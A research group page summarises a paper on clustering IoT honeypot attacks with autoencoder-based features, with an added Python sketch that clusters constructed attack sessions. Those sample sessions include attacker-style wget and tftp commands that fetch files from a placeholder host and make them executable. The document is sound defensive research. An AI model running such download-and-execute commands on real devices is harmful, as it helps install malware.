Junaid Haseeb, Masood Mansoori, Harith Al-Sahaf, and Ian Welch (Owhiti - Cybersecurity Research Group) collaborated with Dr Yuichi Hirose from the School of Mathematics and Statistics to propose a solution for clustering IoT attacks using Autoencoders.

This work captured attacks on simulated Internet of Things (IoT) devices using a medium-interaction server honeypot. Attackers execute commands to instruct devices during exploitation. To understand the behavioral patterns of captured attacks, we investigated the changes introduced in commands executed by attackers in the attack process and how these attacks are linked in terms of similarities and differences in commands. For this purpose, we proposed an approach comprised of feature extraction, feature construction, Autoencoder (AE)-based feature construction and clustering.

Using an AE in the proposed system allowed us to generate an efficient representation of input features by learning the data characteristics used for clustering tasks. In this way, the subjective bias of manually correlating commands was removed. Evaluation results show that clustering performed on AE features groups attacks with more common features and provides meaningful clustering interpretations for understanding the behavioral patterns of attacks.
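The pipeline described above (command features, AE-constructed features, clustering), as an added sketch that is not the paper's code. The sessions are constructed, and the binary command-name features, the tied-weight linear autoencoder and the two-cluster k-means are all assumptions, since this page does not state the paper's feature set, architecture or clustering algorithm.

```python
import random

# Constructed honeypot sessions (illustrative only, not data from the paper).
SESSIONS = [
    ["enable", "sh", "cat /proc/mounts", "wget http://host.invalid/a"],
    ["enable", "sh", "cat /proc/mounts", "wget http://host.invalid/b", "chmod +x b"],
    ["enable", "sh", "cat /proc/mounts", "tftp -g host.invalid"],
    ["uname -a", "free -m", "ps x", "nproc"],
    ["uname -a", "free -m", "ps x", "w"],
    ["uname -a", "free -m", "ps x", "nproc", "w"],
]

def featurize(sessions):
    """Feature extraction (assumed): binary vector of command names per session."""
    vocab = sorted({c.split()[0] for s in sessions for c in s})
    return [[1.0 if v in {c.split()[0] for c in s} else 0.0 for v in vocab] for s in sessions]

def train_encoder(X, k=2, epochs=300, lr=0.01, seed=0):
    """Tied-weight linear autoencoder: code h = W x, reconstruction y = W^T h."""
    rng = random.Random(seed)
    n = len(X[0])
    W = [[rng.uniform(-0.1, 0.1) for _ in range(n)] for _ in range(k)]
    for _ in range(epochs):
        for x in X:  # plain SGD on squared reconstruction error
            h = [sum(w[j] * x[j] for j in range(n)) for w in W]
            err = [sum(W[i][j] * h[i] for i in range(k)) - x[j] for j in range(n)]
            for i in range(k):
                back = sum(err[j] * W[i][j] for j in range(n))  # dL/dh_i (up to factor 2)
                for j in range(n):
                    W[i][j] -= lr * 2 * (err[j] * h[i] + back * x[j])
    return lambda x: [sum(w[j] * x[j] for j in range(n)) for w in W]

def dist2(a, b):
    return sum((p - q) ** 2 for p, q in zip(a, b))

def kmeans2(P, iters=10):
    """Two-cluster k-means with deterministic farthest-point initialisation."""
    centers = [P[0], max(P, key=lambda p: dist2(p, P[0]))]
    for _ in range(iters):
        labels = [min((0, 1), key=lambda c: dist2(p, centers[c])) for p in P]
        for c in (0, 1):
            members = [p for p, l in zip(P, labels) if l == c]
            if members:
                centers[c] = [sum(v) / len(members) for v in zip(*members)]
    return labels

def cluster_sessions(sessions=SESSIONS):
    X = featurize(sessions)
    encode = train_encoder(X)  # AE-constructed features replace manual correlation
    return kmeans2([encode(x) for x in X])
```

Calling `cluster_sessions()` returns one cluster label per session; on the constructed data the download-style sessions and the system-survey sessions land in different clusters.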

This work has been published in: Junaid Haseeb, Masood Mansoori, Yuichi Hirose, Harith Al-Sahaf, and Ian Welch. "Autoencoder-based feature construction for IoT attacks clustering." Future Generation Computer Systems 127 (2022): 487-502. https://doi.org/10.1016/j.future.2021.09.025